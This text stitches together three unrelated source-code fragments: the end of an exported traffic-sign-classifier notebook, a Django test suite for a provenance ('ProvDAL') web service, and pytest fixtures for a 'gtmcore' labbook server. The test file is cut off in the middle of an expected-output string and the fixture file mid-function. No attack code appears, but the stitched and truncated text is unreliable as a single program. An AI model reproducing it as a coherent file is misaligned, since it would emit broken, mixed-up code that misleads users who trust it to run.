# plt.xlabel('Epochs')
# plt.ylabel('Loss')
# plt.legend(handles=[line_train, line_valid])
# plt.show()
# line_train, = plt.plot(epochs, train_acc, 'ro', label ='Training accuracy')
# line_valid, = plt.plot(epochs, valid_acc, 'b', label ='Validation accuracy')
# plt.title('Training and validation accuracy')
# plt.xlabel('Epochs')
# plt.ylabel('Accuracy')
# plt.legend(handles=[line_train, line_valid])
# plt.show()
# ---
#
# ## Step 3: Test a Model on New Images
#
# To give yourself more insight into how your model is working, download at least five pictures of German traffic signs from the web and use your model to predict the traffic sign type.
#
# You may find `signnames.csv` useful as it contains mappings from the class id (integer) to the actual sign name.
# ### Load and Output the Images
# In[ ]:
### Load the images and plot them here.
### Feel free to use as many code cells as needed.
# ### Predict the Sign Type for Each Image
# In[ ]:
### Run the predictions here and use the model to output the prediction for each image.
### Make sure to pre-process the images with the same pre-processing pipeline used earlier.
### Feel free to use as many code cells as needed.
# ### Analyze Performance
# In[ ]:
### Calculate the accuracy for these 5 new images.
### For example, if the model predicted 1 out of 5 signs correctly, it's 20% accurate on these new images.
# ### Output Top 5 Softmax Probabilities For Each Image Found on the Web
# For each of the new images, print out the model's softmax probabilities to show the **certainty** of the model's predictions (limit the output to the top 5 probabilities for each image). [`tf.nn.top_k`](https://www.tensorflow.org/versions/r0.12/api_docs/python/nn.html#top_k) could prove helpful here.
#
# The example below demonstrates how tf.nn.top_k can be used to find the top k predictions for each image.
#
# `tf.nn.top_k` will return the values and indices (class ids) of the top k predictions. So if k=3, for each sign, it'll return the 3 largest probabilities (out of a possible 43) and the corresponding class ids.
#
# Take this numpy array as an example. The values in the array represent predictions. The array contains softmax probabilities for five candidate images with six possible classes. `tf.nn.top_k` is used to choose the three classes with the highest probability:
#
# ```
# # (5, 6) array
# a = np.array([[ 0.24879643, 0.07032244, 0.12641572, 0.34763842, 0.07893497,
# 0.12789202],
# [ 0.28086119, 0.27569815, 0.08594638, 0.0178669 , 0.18063401,
# 0.15899337],
# [ 0.26076848, 0.23664738, 0.08020603, 0.07001922, 0.1134371 ,
# 0.23892179],
# [ 0.11943333, 0.29198961, 0.02605103, 0.26234032, 0.1351348 ,
# 0.16505091],
# [ 0.09561176, 0.34396535, 0.0643941 , 0.16240774, 0.24206137,
# 0.09155967]])
# ```
#
# Running it through `sess.run(tf.nn.top_k(tf.constant(a), k=3))` produces:
#
# ```
# TopKV2(values=array([[ 0.34763842, 0.24879643, 0.12789202],
# [ 0.28086119, 0.27569815, 0.18063401],
# [ 0.26076848, 0.23892179, 0.23664738],
# [ 0.29198961, 0.26234032, 0.16505091],
# [ 0.34396535, 0.24206137, 0.16240774]]), indices=array([[3, 0, | |
import datetime
import re
import json
from django.conf import settings
from django.core.urlresolvers import reverse
from django.utils import timezone
from django.test import TestCase
from django.test import Client
from django.test.utils import setup_test_environment
from prov_vo.models import Activity, ActivityFlow, HadStep
from prov_vo.models import Entity, Collection, WasGeneratedBy, Used, WasDerivedFrom, WasInformedBy, HadMember
from prov_vo.models import Agent, WasAssociatedWith, WasAttributedTo
from prov_vo.models import Parameter, ParameterDescription
from prov_vo.models import ActivityDescription, EntityDescription, UsedDescription, WasGeneratedByDescription
from prov_vo.forms import ProvDalForm
def get_content(response):
    """Strip the PROV-N envelope from a response body.

    Removes the opening 'document' line, the closing 'endDocument' marker and
    all 'prefix ...' declaration lines, leaving only the provenance records.
    """
    body = response.content
    for pattern in (r'document.*\n', r'endDocument', r'prefix.*\n'):
        body = re.sub(pattern, '', body)
    return body
# Model tests
class Activity_TestCase(TestCase):
    """Round-trip a single Activity through the ORM and read it back by id."""

    def setUp(self):
        activity = Activity.objects.create(id="rave:myid", name="mylabel")
        activity.save()

    def test_getActivity(self):
        activity = Activity.objects.get(id="rave:myid")
        self.assertEqual(activity.name, "mylabel")
class ActivityFlow_TestCase(TestCase):
    """Round-trip a single ActivityFlow through the ORM and read it back by id."""

    def setUp(self):
        flow = ActivityFlow.objects.create(id="rave:flow", name="myflow")
        flow.save()

    def test_getActivity(self):
        flow = ActivityFlow.objects.get(id="rave:flow")
        self.assertEqual(flow.name, "myflow")
class Entity_TestCase(TestCase):
    """Round-trip a single Entity through the ORM and read it back by id."""

    def setUp(self):
        entity = Entity.objects.create(id="rave:dr4", name="RAVE DR4")
        entity.save()

    def test_getEntity(self):
        entity = Entity.objects.get(id="rave:dr4")
        self.assertEqual(entity.name, "RAVE DR4")
class Agent_TestCase(TestCase):
    """Round-trip a single Agent through the ORM and read it back by id."""

    def setUp(self):
        agent = Agent.objects.create(id="ex:ag1", name="<NAME>")
        agent.save()

    def test_getAgent(self):
        agent = Agent.objects.get(id="ex:ag1")
        self.assertEqual(agent.name, "<NAME>")
class Used_TestCase(TestCase):
    """Check the Used relation linking an activity to the entity it consumed."""

    def setUp(self):
        pipeline = Entity.objects.create(id="rave:pipeline", name="RAVE Pipeline")
        pipeline.save()
        activity = Activity.objects.create(id="rave:act", name="myactivity")
        activity.save()
        link = Used.objects.create(activity=activity, entity=pipeline)
        link.save()

    def test_getUsed(self):
        # Lookup by the related entity's primary key string.
        link = Used.objects.get(entity="rave:pipeline")
        self.assertEqual(link.entity.name, "RAVE Pipeline")
        self.assertEqual(link.activity.id, "rave:act")
class UsedDescription_TestCase(TestCase):
    """Check the UsedDescription relation between description-level classes."""

    def setUp(self):
        entity_desc = EntityDescription.objects.create(id="rave:pipeline", name="RAVE Pipeline")
        entity_desc.save()
        activity_desc = ActivityDescription.objects.create(id="rave:act", name="myactivity")
        activity_desc.save()
        link = UsedDescription.objects.create(activityDescription=activity_desc, entityDescription=entity_desc)
        link.save()

    def test_getUsedDescription(self):
        link = UsedDescription.objects.get(entityDescription="rave:pipeline")
        self.assertEqual(link.entityDescription.name, "RAVE Pipeline")
        self.assertEqual(link.activityDescription.id, "rave:act")
class WasGeneratedBy_TestCase(TestCase):
    """Check the WasGeneratedBy relation linking an entity to the activity that produced it."""

    def setUp(self):
        data = Entity.objects.create(id="rave:data", name="RAVE data")
        data.save()
        activity = Activity.objects.create(id="rave:act", name="myactivity")
        activity.save()
        link = WasGeneratedBy.objects.create(activity=activity, entity=data)
        link.save()

    def test_getWasGeneratedBy(self):
        link = WasGeneratedBy.objects.get(entity="rave:data")
        self.assertEqual(link.entity.name, "RAVE data")
        self.assertEqual(link.activity.id, "rave:act")
class WasGeneratedByDescription_TestCase(TestCase):
    """Check the WasGeneratedByDescription relation between description-level classes."""

    def setUp(self):
        entity_desc = EntityDescription.objects.create(id="rave:data", name="RAVE data")
        entity_desc.save()
        activity_desc = ActivityDescription.objects.create(id="rave:act", name="myactivity")
        activity_desc.save()
        link = WasGeneratedByDescription.objects.create(activityDescription=activity_desc, entityDescription=entity_desc)
        link.save()

    def test_getWasGeneratedByDescription(self):
        link = WasGeneratedByDescription.objects.get(entityDescription="rave:data")
        self.assertEqual(link.entityDescription.name, "RAVE data")
        self.assertEqual(link.activityDescription.id, "rave:act")
# View tests
# ==========
class ProvDAL_Accept_TestCase(TestCase):
    """Content-negotiation tests for the ProvDAL endpoint.

    Each test requests the single stored entity with a combination of the
    RESPONSEFORMAT parameter and an HTTP Accept header, then checks the
    status: 200 (served), 406 (format/Accept mismatch) or 415 (unsupported).
    """

    # Expected PROV-JSON body for the entity created in setUp (prefix map stripped).
    EXPECTED_JSON = {'entity': {'ex:ent': {'voprov:id': 'ex:ent', 'voprov:name': 'An example entity'}}}

    def setUp(self):
        entity = Entity.objects.create(id="ex:ent", name="An example entity")
        entity.save()

    def _request(self, query='', **extra):
        """GET the ProvDAL endpoint for entity ex:ent with extra query string / request headers."""
        return Client().get(reverse('prov_vo:provdal') + '?ID=ex:ent' + query, **extra)

    def test_get_format_default(self):
        response = self._request()
        self.assertEqual(response.status_code, 200)
        document = json.loads(response.content)
        document.pop('prefix', None)  # remove prefix
        self.assertEqual(document, self.EXPECTED_JSON)

    def test_get_format_default2(self):
        response = self._request(HTTP_ACCEPT="*/*")
        self.assertEqual(response.status_code, 200)
        document = json.loads(response.content)
        document.pop('prefix', None)  # remove prefix
        self.assertEqual(document, self.EXPECTED_JSON)

    def test_get_format_provn1(self):
        self.assertEqual(self._request('&RESPONSEFORMAT=PROV-N', HTTP_ACCEPT="*/*").status_code, 200)

    def test_get_format_provn2(self):
        self.assertEqual(self._request('&RESPONSEFORMAT=PROV-N', HTTP_ACCEPT="text/*").status_code, 200)

    def test_get_format_provn3(self):
        self.assertEqual(self._request('&RESPONSEFORMAT=PROV-N', HTTP_ACCEPT="text/plain").status_code, 200)

    def test_get_format_provn_wrongaccept(self):
        # PROV-N is text; an application/json-only Accept header is not acceptable.
        self.assertEqual(self._request('&RESPONSEFORMAT=PROV-N', HTTP_ACCEPT="application/json").status_code, 406)

    def test_get_format_provjson1(self):
        self.assertEqual(self._request('&RESPONSEFORMAT=PROV-JSON', HTTP_ACCEPT="*/*").status_code, 200)

    def test_get_format_provjson2(self):
        self.assertEqual(self._request('&RESPONSEFORMAT=PROV-JSON', HTTP_ACCEPT="application/*").status_code, 200)

    def test_get_format_provjson3(self):
        self.assertEqual(self._request('&RESPONSEFORMAT=PROV-JSON', HTTP_ACCEPT="application/json").status_code, 200)

    def test_get_format_provjson_wrongaccept(self):
        # PROV-JSON cannot be served as text/plain.
        self.assertEqual(self._request('&RESPONSEFORMAT=PROV-JSON', HTTP_ACCEPT="text/plain").status_code, 406)

    def test_get_format_provxml1(self):
        self.assertEqual(self._request('&RESPONSEFORMAT=PROV-XML', HTTP_ACCEPT="*/*").status_code, 200)

    def test_get_format_provxml22(self):
        self.assertEqual(self._request('&RESPONSEFORMAT=PROV-XML', HTTP_ACCEPT="application/*").status_code, 200)

    def test_get_format_provxml3(self):
        self.assertEqual(self._request('&RESPONSEFORMAT=PROV-XML', HTTP_ACCEPT="application/xml").status_code, 200)

    def test_get_format_unsupported(self):
        # Unknown RESPONSEFORMAT value -> unsupported media type.
        self.assertEqual(self._request('&RESPONSEFORMAT=HUBBA').status_code, 415)

    def test_get_format_unsupportedaccept(self):
        # Accept header no serializer can satisfy -> unsupported media type.
        self.assertEqual(self._request(HTTP_ACCEPT="image/png").status_code, 415)
class ProvDAL_General_TestCase(TestCase):
def setUp(self):
a = Activity.objects.create(id="rave:act", name="myactivity")
a.save()
af = ActivityFlow.objects.create(id="rave:flow", name="myflow")
af.save()
h = HadStep.objects.create(activityFlow=af, activity=a)
h.save()
e = Entity.objects.create(id="rave:dr4", name="RAVE DR4")
e.save()
e0 = Entity.objects.create(id="rave:obs", name="RAVE observations")
e0.save()
wg = WasGeneratedBy.objects.create(entity=e, activity=a)
wg.save()
u = Used.objects.create(activity=a, entity=e0)
u.save()
#wd = WasDerivedFrom.objects.create(generatedEntity=e, usedEntity=e0)
#wd.save()
ag = Agent.objects.create(id="org:rave", name="RAVE project")
ag.save()
was = WasAssociatedWith.objects.create(activity=a, agent=ag)
was.save()
wat = WasAttributedTo.objects.create(entity=e, agent=ag)
wat.save()
# ID is a required parameter
def test_getProvdalNoID(self):
client = Client()
response = client.get(reverse('prov_vo:provdal'))
self.assertEqual(response.status_code, 400)
self.assertEqual(response.content, 'Bad request: the ID parameter is required.')
def test_getProvdalNothingFound(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=blabla&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
found = re.findall(r"^act.*", response.content, flags=re.MULTILINE)
numlines = len(found)
self.assertEqual(numlines, 0)
def test_getProvdalPrefix(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=blabla&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
expected = \
"""document
prefix rave <http://www.rave-survey.org/prov/>
prefix prov <http://www.w3.org/ns/prov#>
prefix xsd <http://www.w3.org/2000/10/XMLSchema#>
prefix voprov <http://www.ivoa.net/documents/ProvenanceDM/ns/voprov/>
prefix custom <http://www.ivoa.net/documents/ProvenanceDM/ns/custom/>
endDocument"""
self.assertEqual(response.content, expected)
def test_get_caseinsensitive(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?id=rave:obs&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
content = get_content(response)
expected = \
"""entity(rave:obs, [voprov:name="RAVE observations"])
"""
self.assertEqual(content, expected)
def test_get_caseinsensitive_multi(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?id=rave:obs&ID=rave:dr4&RESPONSEFORMAT=PROV-N&DEPTH=0')
self.assertEqual(response.status_code, 200)
content = get_content(response)
expected = \
"""entity(rave:dr4, [voprov:name="RAVE DR4"])
entity(rave:obs, [voprov:name="RAVE observations"])
"""
self.assertEqual(content, expected)
def test_get_multisinglevalues(self):
client = Client()
for param in ['RESPONSEFORMAT', 'DEPTH', 'MODEL', 'MEMBERS', 'STEPS', 'AGENT', 'DIRECTION']:
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:dr4&%s=1&%s=2' % (param, param))
self.assertEqual(response.status_code, 400)
content = response.content
expected = "Bad request: parameter %s must occur only once or not at all." % (param)
self.assertEqual(content, expected)
def test_get_unsupportedparameter(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:dr4&SOMETHING=nothing')
self.assertEqual(response.status_code, 400)
content = response.content
expected = "Bad request: parameter SOMETHING is not supported by this service."
self.assertEqual(content, expected)
def test_get_unsupportedparameters(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:dr4&SOMETHING=nothing&ANYTHING=null')
self.assertEqual(response.status_code, 400)
content = response.content
expected = "Bad request: parameters ANYTHING, SOMETHING are not supported by this service."
self.assertEqual(content, expected)
def test_getProvdalActivityID(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:act&DEPTH=0&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
content = get_content(response)
expected = """activity(rave:act, -, -, [voprov:name="myactivity"])\n"""
self.assertEqual(expected, content)
def test_getProvdalEntityID(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:dr4&DEPTH=0&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
content = get_content(response)
expected = """entity(rave:dr4, [voprov:name="RAVE DR4"])\n"""
self.assertEqual(expected, content)
def test_getProvdalAgentID(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=org:rave&DEPTH=1&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
# only the agent itself should be returned
content = get_content(response)
expected = """agent(org:rave, [voprov:name="RAVE project"])\n"""
self.assertEqual(expected, content)
def test_getProvdalEntityIDMultiple(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:dr4&ID=rave:obs&DEPTH=0&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
content = get_content(response)
expected = """entity(rave:dr4, [voprov:name="RAVE DR4"])
entity(rave:obs, [voprov:name="RAVE observations"])
"""
self.assertEqual(expected, content)
def test_getProvdalMixedIDs(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:dr4&ID=rave:act&ID=org:rave&DEPTH=0&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
content = get_content(response)
expected = """\
activity(rave:act, -, -, [voprov:name="myactivity"])
entity(rave:dr4, [voprov:name="RAVE DR4"])
agent(org:rave, [voprov:name="RAVE project"])
"""
self.assertEqual(expected, content)
def test_getProvdalActivityFlow(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:flow&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
expected = 'activityFlow(rave:flow, -, -, [voprov:name="myflow"])'
found = re.search(r"^act.*", response.content, flags=re.MULTILINE)
self.assertEqual(found.group(0), expected)
def test_getProvdalActivityFlowW3C(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:flow&RESPONSEFORMAT=PROV-N&MODEL=W3C')
self.assertEqual(response.status_code, 200)
expected = 'activity(rave:flow, -, -, [prov:label="myflow", voprov:votype="voprov:activityFlow"])'
found = re.search(r"^act.*", response.content, flags=re.MULTILINE)
self.assertEqual(found.group(0), expected)
def test_getProvdalActivityFlowDepth2(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:flow&DEPTH=2&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
found = re.findall(r"^act.*", response.content, flags=re.MULTILINE)
self.assertEqual(len(found), 1)
def test_getProvdalActivityFlowIncludeSteps(self):
# If STEPS=TRUE, substeps of the activityFlow shall be followed,
# thus both, activityFlow and activity must be returned
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:flow&DEPTH=3&STEPS=true&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
found = re.findall(r"^act.*", response.content, flags=re.MULTILINE)
self.assertEqual(len(found), 2)
def test_getProvdalActivityFlowIncludeStepsW3C(self):
# If STEPS=TRUE, substeps of the activityFlow shall be followed,
# thus both, activityFlow and activity must be returned
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:flow&DEPTH=3&STEPS=true&RESPONSEFORMAT=PROV-N&MODEL=W3C')
#print 'content: ', response.content
self.assertEqual(response.status_code, 200)
found = re.findall(r"^act.*", response.content, flags=re.MULTILINE)
self.assertEqual(len(found), 2)
found2 = re.findall(r"^wasInfluencedBy.*", response.content, flags=re.MULTILINE)
self.assertEqual(len(found2), 1)
def test_getProvdalActivityDepth2(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:act&DEPTH=2&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
found = re.findall(r"^act.*", response.content, flags=re.MULTILINE)
self.assertEqual(len(found), 2)
def test_getProvdalHadStepW3C(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:act&DEPTH=1&RESPONSEFORMAT=PROV-XML&MODEL=W3C')
self.assertEqual(response.status_code, 200)
expected = \
"""<prov:document xmlns:custom="http://www.ivoa.net/documents/ProvenanceDM/ns/custom/" xmlns:prov="http://www.w3.org/ns/prov#" xmlns:rave="http://www.rave-survey.org/prov/" xmlns:voprov="http://www.ivoa.net/documents/ProvenanceDM/ns/voprov/" xmlns:xsd="http://www.w3.org/2000/10/XMLSchema#">
<prov:activity prov:id="rave:act">
<prov:label>myactivity</prov:label>
</prov:activity>
<prov:activity prov:id="rave:flow">
<prov:label>myflow</prov:label>
<voprov:votype>voprov:activityFlow</voprov:votype>
</prov:activity>
<prov:entity prov:id="rave:obs">
<prov:label>RAVE observations</prov:label>
</prov:entity>
<prov:agent prov:id="org:rave">
<prov:label>RAVE project</prov:label>
</prov:agent>
<prov:used>
<prov:activity prov:ref="rave:act"/>
<prov:entity prov:ref="rave:obs"/>
</prov:used>
<prov:wasAssociatedWith>
<prov:activity prov:ref="rave:act"/>
<prov:agent prov:ref="org:rave"/>
</prov:wasAssociatedWith>
<prov:wasInfluencedBy>
<prov:influencee prov:ref="rave:flow"/>
<prov:influencer prov:ref="rave:act"/>
<voprov:votype>voprov:hadStep</voprov:votype>
</prov:wasInfluencedBy>
</prov:document>
"""
self.assertEqual(expected, response.content)
# In this implementation, ID can also take an agent's ID, but agent relations are only
# followed beyond the agent if AGENT option is set to TRUE
def test_getProvdalAgentFollow(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=org:rave&AGENT=TRUE&DEPTH=1&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
# agent, activity, entity, wat and was. relation should be returned
# strip begin/end document and prefix from response content:
content = get_content(response)
expected = \
"""activity(rave:act, -, -, [voprov:name="myactivity"])
entity(rave:dr4, [voprov:name="RAVE DR4"])
agent(org:rave, [voprov:name="RAVE project"])
wasAssociatedWith(rave:act, org:rave, -)
wasAttributedTo(rave:dr4, org:rave)
"""
self.assertEqual(expected, content)
def test_getProvdalAgentFollowW3C(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=org:rave&AGENT=TRUE&DEPTH=1&RESPONSEFORMAT=PROV-N&MODEL=W3C')
self.assertEqual(response.status_code, 200)
# agent, activity, entity, wat and was. relation should be returned
# strip begin/end document and prefix from response content:
content = get_content(response)
expected = \
"""activity(rave:act, -, -, [prov:label="myactivity"])
entity(rave:dr4, [prov:label="RAVE DR4"])
agent(org:rave, [prov:label="RAVE project"])
wasAssociatedWith(rave:act, org:rave, -)
wasAttributedTo(rave:dr4, org:rave)
"""
self.assertEqual(expected, content)
def test_getProvdalBack(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:act&DEPTH=1&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
content = re.sub(r'document.*\n', '', response.content)
content = re.sub(r'endDocument', '', content)
content = re.sub(r'prefix.*\n', '', content)
expected = \
"""activity(rave:act, -, -, [voprov:name="myactivity"])
activityFlow(rave:flow, -, -, [voprov:name="myflow"])
entity(rave:obs, [voprov:name="RAVE observations"])
agent(org:rave, [voprov:name="RAVE project"])
used(rave:act, rave:obs, -)
wasAssociatedWith(rave:act, org:rave, -)
hadStep(rave:flow, rave:act)
"""
self.assertEqual(content, expected)
def test_getProvdalForth(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:act&DEPTH=1&DIRECTION=FORTH&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
content = re.sub(r'document.*\n', '', response.content)
content = re.sub(r'endDocument', '', content)
content = re.sub(r'prefix.*\n', '', content)
expected = \
"""activity(rave:act, -, -, | |
<gh_stars>10-100
from typing import Tuple
import pytest
import tempfile
import os
import uuid
import shutil
import graphene
from flask import Flask
import flask
import time
import redis
import responses
from graphene.test import Client
from gtmcore.files import FileOperations
from gtmcore.container.local_container import get_docker_client
from gtmcore.environment import RepositoryManager
from gtmcore.configuration.configuration import Configuration, deep_update
from gtmcore.auth.identity import get_identity_manager_class
from gtmcore.environment.bundledapp import BundledAppManager
from gtmcore.inventory.inventory import InventoryManager
from lmsrvcore.middleware import DataloaderMiddleware, error_middleware, RepositoryCacheMiddleware
from lmsrvcore.caching import DatasetCacheController
from lmsrvcore.tests.fixtures import insert_cached_identity
from gtmcore.fixtures import (ENV_UNIT_TEST_REPO, ENV_UNIT_TEST_REV, ENV_UNIT_TEST_BASE)
from gtmcore.container import container_for_context
from gtmcore.environment import ComponentManager
from gtmcore.imagebuilder import ImageBuilder
from lmsrvlabbook.api.query import LabbookQuery
from lmsrvlabbook.api.mutation import LabbookMutations
from gtmcore.fixtures.datasets import helper_append_file
from gtmcore.fixtures.fixtures import _create_temp_work_dir
from gtmcore.dataset.cache import get_cache_manager_class
from gtmcore.dataset import Manifest
import gtmcore
@pytest.fixture(scope='session')
def mock_enable_unmanaged_for_testing():
    """A pytest fixture that enables unmanaged datasets for testing. Until unmanaged datasets are completed, they
    are disabled and dormant. We want to keep testing them and carry the code forward, but don't want them to be
    used yet.

    When running via a normal build, only "gigantum_object_v1" is available. To enable the others, you need to edit
    gtmcore.dataset.storage.SUPPORTED_STORAGE_BACKENDS in gtmcore.dataset.storage.__init__.py

    When this is done (unmanaged datasets are being re-activated) you should remove this fixture everywhere.
    """
    # Fix: remember the real backend registry so the monkey-patch below can be
    # undone on teardown instead of leaking past the fixture's lifetime.
    original_backends = gtmcore.dataset.storage.SUPPORTED_STORAGE_BACKENDS
    gtmcore.dataset.storage.SUPPORTED_STORAGE_BACKENDS = {
        "gigantum_object_v1": ("gtmcore.dataset.storage.gigantum", "GigantumObjectStore"),
        "local_filesystem": ("gtmcore.dataset.storage.local", "LocalFilesystem"),
        "public_s3_bucket": ("gtmcore.dataset.storage.s3", "PublicS3Bucket")}
    yield
    # Restore the original registry at the end of the test session.
    gtmcore.dataset.storage.SUPPORTED_STORAGE_BACKENDS = original_backends
class EnvironMock(object):
    """Minimal stand-in for the Flask environ object carrying a fake bearer token.

    Lets code that reads ``environ['HTTP_AUTHORIZATION']`` run in tests
    without a real request.
    """

    def __init__(self):
        self.environ = dict(HTTP_AUTHORIZATION="Bearer afaketoken")
class ContextMock(object):
    """Minimal stand-in for the Flask request context used as graphene context_value.

    Exposes the two attributes middleware expects: a ``labbook_loader`` slot
    (None until the dataloader middleware populates it) and ``headers``
    carrying a fake authorization environ.
    """

    def __init__(self):
        self.headers = EnvironMock()
        self.labbook_loader = None
@pytest.fixture
def fixture_working_dir():
    """A pytest fixture that creates a temporary working directory, config file, schema, and local user identity.

    Yields:
        tuple: (Configuration instance, temp working dir path, graphene test Client, graphene Schema)

    The temporary working directory and cached configuration are removed on teardown.
    """
    # Create temp dir
    config_instance, temp_dir = _create_temp_work_dir()

    # Create user identity
    insert_cached_identity(config_instance.app_workdir)

    # Create test client
    schema = graphene.Schema(query=LabbookQuery, mutation=LabbookMutations)

    # Load User identity into app context
    app = Flask("lmsrvlabbook")
    app.config["LABMGR_CONFIG"] = config = Configuration()
    app.config["ID_MGR_CLS"] = get_identity_manager_class(config)

    with app.app_context():
        # within this block, current_app points to app. Set current user explicitly(this is done in the middleware)
        flask.g.user_obj = get_identity_manager_class(config)(config).get_user_profile()
        flask.g.access_token = "<PASSWORD>"  # placeholder token; real auth is not exercised here
        flask.g.id_token = "<PASSWORD>"

        # Create a test client
        client = Client(schema, middleware=[DataloaderMiddleware(), RepositoryCacheMiddleware()],
                        context_value=ContextMock())

        # name of the config file, temporary working directory (for the current server), the schema
        yield config_instance, temp_dir, client, schema

    # Remove the temp_dir
    config_instance.clear_cached_configuration()
    shutil.rmtree(temp_dir)
@pytest.fixture
def fixture_working_dir_dataset_tests(fixture_working_dir, mock_enable_unmanaged_for_testing):
    """A pytest fixture to enable all dataset types for testing only. This can be removed and should be replaced in all
    test functions with `fixture_working_dir` once unmanaged datasets are truly enabled.

    Yields the same 4-tuple as `fixture_working_dir`; requesting
    `mock_enable_unmanaged_for_testing` first activates all storage backends.
    """
    yield fixture_working_dir
@pytest.fixture
def fixture_working_dir_lfs_disabled():
    """A pytest fixture that creates a temporary working directory, config file, schema, and local user identity.

    Identical to `fixture_working_dir` except the temp working dir is created
    with git-lfs support disabled (lfs_enabled=False).

    Yields:
        tuple: (Configuration instance, temp working dir path, graphene test Client, graphene Schema)
    """
    # Create temp dir (lfs disabled is the only difference from fixture_working_dir)
    config_instance, temp_dir = _create_temp_work_dir(lfs_enabled=False)

    # Create user identity
    insert_cached_identity(config_instance.app_workdir)

    # Create test client
    schema = graphene.Schema(query=LabbookQuery, mutation=LabbookMutations)

    # Load User identity into app context
    app = Flask("lmsrvlabbook")
    app.config["LABMGR_CONFIG"] = config = Configuration()
    app.config["ID_MGR_CLS"] = get_identity_manager_class(config)

    with app.app_context():
        # within this block, current_app points to app. Set current user explicitly(this is done in the middleware)
        flask.g.user_obj = get_identity_manager_class(config)(config).get_user_profile()
        flask.g.access_token = "<PASSWORD>"
        flask.g.id_token = "<PASSWORD>"

        # Create a test client
        client = Client(schema, middleware=[DataloaderMiddleware(), RepositoryCacheMiddleware()],
                        context_value=ContextMock())

        yield config_instance, temp_dir, client, schema

    # Remove the temp_dir
    config_instance.clear_cached_configuration()
    shutil.rmtree(temp_dir)
@pytest.fixture(scope="class")
def fixture_working_dir_env_repo_scoped():
    """A pytest fixture that creates a temporary working directory, a config file to match, creates the schema,
    and populates the environment component repository.

    Class scope modifier attached

    Yields:
        tuple: (Configuration instance, temp working dir path, graphene test Client, graphene Schema)
    """
    # Create temp dir
    config_instance, temp_dir = _create_temp_work_dir()

    # Create user identity
    insert_cached_identity(config_instance.app_workdir)

    # Create test client
    schema = graphene.Schema(query=LabbookQuery, mutation=LabbookMutations)

    # get environment data and index it so environment components can be queried
    erm = RepositoryManager()
    erm.update_repositories()
    erm.index_repositories()

    # Load User identity into app context
    app = Flask("lmsrvlabbook")
    app.config["LABMGR_CONFIG"] = config = Configuration()
    app.config["ID_MGR_CLS"] = get_identity_manager_class(config)

    with app.app_context():
        # within this block, current_app points to app. Set current user explicitly (this is done in the middleware)
        flask.g.user_obj = get_identity_manager_class(config)(config).get_user_profile()
        flask.g.access_token = "<PASSWORD>"
        flask.g.id_token = "<PASSWORD>"

        # Create a test client; note error_middleware is included here (unlike fixture_working_dir)
        client = Client(schema, middleware=[DataloaderMiddleware(), error_middleware, RepositoryCacheMiddleware()],
                        context_value=ContextMock())

        # name of the config file, temporary working directory (for current server), the schema
        yield config_instance, temp_dir, client, schema

    # Remove the temp_dir
    config_instance.clear_cached_configuration()
    shutil.rmtree(temp_dir)
@pytest.fixture(scope="class")
def fixture_working_dir_populated_scoped():
    """A pytest fixture that creates a temporary working directory, a config file to match, creates the schema,
    and populates the inventory with a set of labbooks.

    Class scope modifier attached

    Yields:
        tuple: (Configuration instance, temp working dir path, graphene test Client, graphene Schema)
    """
    # Flush here to clean out the Repository cache (used to store create/modify dates).
    redis.Redis(db=7).flushdb()

    # Create temp dir
    config_instance, temp_dir = _create_temp_work_dir()

    # Create user identity
    insert_cached_identity(config_instance.app_workdir)

    # Create test client
    schema = graphene.Schema(query=LabbookQuery, mutation=LabbookMutations)

    # Create a bunch of lab books for the default user. The sleep between
    # creations guarantees strictly increasing modification timestamps so
    # sort-order tests are deterministic.
    im = InventoryManager()
    nouns = ('Cats', 'Dogs', 'Mice', 'Horses', 'Cheese', 'Goat', 'Turtle', 'Lamb', 'Taco')
    for number, noun in enumerate(nouns, start=1):
        im.create_labbook('default', 'default', "labbook{}".format(number),
                          description="{} labbook {}".format(noun, number))
        time.sleep(1.1)

    # A labbook owned by another user; queries scoped to 'default' must not return it.
    im.create_labbook('test3', 'test3', "labbook-0", description="This should not show up.")

    # Load User identity into app context
    app = Flask("lmsrvlabbook")
